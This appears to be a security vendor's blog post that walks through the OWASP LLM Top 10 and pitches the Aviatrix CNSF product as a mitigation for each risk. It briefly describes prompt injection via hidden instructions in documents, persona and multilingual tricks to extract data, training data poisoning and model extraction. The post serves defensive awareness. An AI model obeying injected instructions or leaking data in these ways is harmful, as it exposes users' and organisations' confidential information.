The threats hitting AI systems today are already being exploited in the wild, and they’re bypassing the defenses that carried you through the last decade.
Firewalls, EDR (endpoint detection and response), SIEM (security information and event management), IAM (identity access and management), all designed for predictable, human-driven systems, can’t see or stop the new class of AI-driven threats. Large Language Models (LLMs) don’t just process data. They generate, decide, and act based on inputs you don’t fully control. They pull from unvetted sources, form unprogrammed connections, and touch systems you might not even know are in scope.
Old defenses can’t parse a malicious prompt or see that a model was poisoned months ago. They can’t tell whether an output is safe until it’s too late. The Aviatrix Cloud Native Security Fabric (CNSF) is a pervasive, cloud-agnostic security solution that modern cloud networks need to proactively address these AI vulnerabilities. It’s designed to fill security gaps by serving as the comprehensive protective layer for your entire single-, hybrid, or multicloud network, providing high-performance encryption, visibility, segmentation, and security policy enforcement to detect and stop threats, AI-powered and otherwise, in the runtime.
To meet these challenges head-on, we’re launching a two-part blog series that breaks down the AI vulnerabilities enterprises are already facing — and how Aviatrix CNSF neutralizes them in the runtime, where legacy tools can’t.
We’re anchoring this series around the AI security frameworks being developed by OWASP — the Open Worldwide Application Security Project. Known for shaping industry standards like the original OWASP Top 10 for web app security, OWASP is now doing the same for AI, with new guidance tailored to language models and autonomous agents.
Part 1 (this post): The OWASP LLM Top 10, with definitions, attack scenarios, business impacts, CNSF mitigations, and in-the-wild examples.
Part 2: The emerging OWASP Agentic AI vulnerabilities — where the risk shifts from what AI says to what AI does.
The OWASP LLM Top 10: AI Vulnerabilities and How to Mitigate Them with CNSF
Here are the top 10 dangers in the OWASP LLM Top 10 and how Aviatrix CNSF can protect against them:
1. Prompt Injection
In prompt injection attacks, a malicious input manipulates an LLM’s instructions, making it perform unintended actions. For example, an attacker embeds hidden instructions in a document that, when processed, trigger data exfiltration. These attacks result in data theft, compliance violations and reputational damage.
In-the-Wild Example: Common prompt injection attack techniques include using multiple languages, personas, and conflicting instructions to trick LLMs into revealing sensitive data.
How CNSF Can Help
Aviatrix CNSF provides traffic inspection for both ingress and egress (incoming and outgoing) network traffic. It restricts and monitors outbound traffic from LLM-connected systems to block exfiltration paths, preventing attackers from stealing data. CNSF does not inspect or neutralize the prompt itself, but it neutralizes the threat.
2. Insecure Output Handling
Insecure output handling occurs when employees use AI output without validation, potentially leading to code execution or compromise. For example, an LLM-generated code with a hidden malicious API call is pushed to production without review. The business impact includes remote code execution and malware deployment.
In-the-Wild Example: In 2024, malicious instructions were found in AI-generated code on GitHub.
How CNSF Can Help
Aviatrix CNSF can segment your entire distributed network across clouds, containers, and environments to prevent attackers from moving laterally once they’re inside. It can segment execution environments and apply runtime traffic controls to block malicious outbound connections, taking the teeth out of an attack.
3. Training Data Poisoning
In training data poisoning scenarios, malicious or biased data is inserted into training datasets to influence outputs. A public dataset is seeded with entries that cause exploitable responses. Training data poisoning can result in persistent bad outputs, reputational harm, and systemic bias.
In-the-Wild Example: Researchers found that they could exploit invalid trust assumptions and poison 0.01% of certain datasets for only $60.
How CNSF Can Help
Aviatrix CNSF can secure and authenticate access to training repositories to prevent unauthorized injection, keeping these datasets safe.
4. Model Denial-of-Service (DoS)
Attackers use Model Denial-of-Service to overloading an LLM with complex queries to exhaust resources. Imagine an attacker flooding an AI API with resource-heavy queries until it’s unusable. A DoS attack can results in outages, SLA violations, and operational disruption.
In-the-Wild Example: In May 2025, Cloudflare blocked a monumental 7.3 Tbps DDoS attack, the largest attack ever recorded.
How CNSF Can Help
Aviatrix CNSF can apply rate limits to prevent this type of attack and isolate abusive traffic sources.
5. Supply Chain Vulnerabilities
Supply chain vulnerabilities are compromises in model dependencies, libraries, or APIs. For example, a plugin update injects a backdoor into an LLM app. These vulnerabilities can open the door to unauthorized access, malware spread, and data compromise.
In-the-Wild Example: Malicious models uploaded to Hugging Face with embedded malware.
How CNSF Can Help
Aviatrix CNSF can control and inspect traffic between AI components and untrusted services. It offers anomaly detection that flags unusual activity, helping security teams prioritize alerts.
6. Sensitive Information Disclosure
In this situation, LLMs unintentionally reveal confidential data. For example, engineers paste source code into ChatGPT, leaking proprietary algorithms. These disclosures can cause trade secret loss, penalties, and competitive disadvantage.
In-the-Wild Example: Samsung engineers leaked sensitive code to ChatGPT in 2023.
How CNSF Can Help
CNSF can help enforce outbound data inspection and block traffic violating egress policies. Even if an attacker manages to infiltrate a network, any sensitive information they can get is useless if they can’t smuggle it out.
7. Overreliance on LLMs
Overreliance on LLMs means blind trust in LLM outputs without verification. This can look like lawyers filing fabricated legal cases generated by AI or developers deploying AI-generated code without reviewing or testing it. This overreliance can lead to legal sanctions, reputational harm, and operational errors.
In-the-Wild Example: NY lawyers were fined for submitting fake citations from ChatGPT.
How CNSF Can Help
Aviatrix CNSF can enforce review steps for automated actions from LLMs, forcing teams to look over LLM outputs before acting on them.
8. Insecure Plugin Design
Plugins or integrations can grant overly broad permissions. For example, an attacker could exploit an insecure plugin to access sensitive databases. These attacks can result in attackers escalating privileges once in the system and, eventually, data breaches.
In-the-Wild Example: Researchers exploited OpenAI plugins to reach unintended data sources.
How CNSF Can Help
Aviatrix CNSF can segment and control API calls made by plugins, preventing massive data breaches.
9. Model Theft
Model theft is the unauthorized extraction or replication of an LLM. For example, an attacker could querying a model repeatedly to reconstruct its weights. Model theft can result in IP loss, competitive disadvantage, and legal exposure.
In-the-Wild Example: North Carolina State University’s Department of Electrical and Computer Engineering found that they could use the TPUXtract method to steal an AI model.
How CNSF Can Help
With network-wide visibility and troubleshooting, Aviatrix CNSF can detect and restrict traffic patterns consistent with model extraction.
10. Improper Access Control
Improper access control refers to weak or missing authentication for LLM systems or data sources. This vulnerability can mean that a bad actor can access an LLM API without credentials. These scenarios can cause data exposure or unauthorized actions.
In-the-Wild Example: A hacker discovered a vulnerability in KAYAK that could allow an attacker to assume control of any account logged into KAYAK’s Android application.
How CNSF Can Help
Aviatrix CNSF can enforce identity-aware segmentation so only authorized identities reach LLM services. CNSF controls work based on identity, not ephemeral labels like IP addresses that can change, making the authentication process much safer and more reliable.
From Words to Actions: The Next AI Security Frontier
The OWASP LLM Top 10 is proof that AI has created a new class of vulnerabilities your legacy tools can’t stop. These attacks are happening now, slipping past defenses that were never built for machine-driven decision-making.
But this is only the first wave. LLM risks are about bending language to an attacker’s will. Next comes the leap from influence to control, when AI doesn’t just generate answers but executes actions across your infrastructure.
In Part 2, we’ll step into the world of Agentic AI: where bad prompts turn into bad actions, and the blast radius multiplies at machine speed. That’s where the stakes get real, and where your security strategy must change the fastest.
Learn more about how Aviatrix CNSF can prevent AI accidents.
Schedule a demo to see CNSF in action.
References
arXiv, “Poisoning Web-Scale Training Datasets is Practical,” February 20, 2023, https://arxiv.org/abs/2302.10149.
AWS, “Common prompt injection attacks,” accessed August 19, 2025, https://docs.aws.amazon.com/prescriptive-guidance/latest/llm-prompt-engineering-best-practices/common-attacks.html.
Cloudflare, “Defending the Internet: how Cloudflare blocked a monumental 7.3 Tbps DDoS attack,” June 19, 2025, https://blog.cloudflare.com/defending-the-internet-how-cloudflare-blocked-a-monumental-7-3-tbps-ddos/?_gl=1*sukxnh*_gcl_au*MTkxNDcwOTIxMi4xNzU1MTgxMzk4*_ga*Y2RkY2VjZjktNTQxZS00NjdlLWE1YjYtZWRjN2M4M2FkOGU5*_ga_SQCRB0TXZW*czE3NTU2MjY2ODEkbzYkZzEkdDE3NTU2MjY3MzMkajgkbDAkaDA./
DarkReading, “With 'TPUXtract,' Attackers Can Steal Orgs' AI Models,” December 13, 2024, https://www.darkreading.com/vulnerabilities-threats/tpuxtract-attackers-steal-ai-models.
Forbes, “Samsung Bans ChatGPT Among Employees After Sensitive Code Leak,” May 2, 2023, https://www.forbes.com/sites/siladityaray/2023/05/02/samsung-bans-chatgpt-and-other-chatbots-for-employees-after-sensitive-code-leak/.
GitProtect, “How Attackers Use AI To Spread Malware On GitHub,” March 18, 2025, https://gitprotect.io/blog/how-attackers-use-ai-to-spread-malware-on-github/.
HackerOne, “How an Improper Access Control Vulnerability Led to Account Theft in One Click,” November 6, 2024, https://www.hackerone.com/blog/how-improper-access-control-vulnerability-led-account-theft-one-click.
ReverseLabs, “Malicious ML models discovered on Hugging Face platform,” February 6, 2025, https://www.reversinglabs.com/blog/rl-identifies-malware-ml-model-hosted-on-hugging-face.
Reuters, “New York lawyers sanctioned for using fake ChatGPT cases in legal brief,” June 26, 2023, https://www.reuters.com/legal/new-york-lawyers-sanctioned-using-fake-chatgpt-cases-legal-brief-2023-06-22/
OWASP, “OWASP Top 10 for Large Language Model Applications,” accessed August 19, 2025, https://owasp.org/www-project-top-10-for-large-language-model-applications/.
WIRED, “A Single Poisoned Document Could Leak ‘Secret’ Data Via ChatGPT,” August 6, 2025, https://www.wired.com/story/poisoned-document-could-leak-secret-data-chatgpt/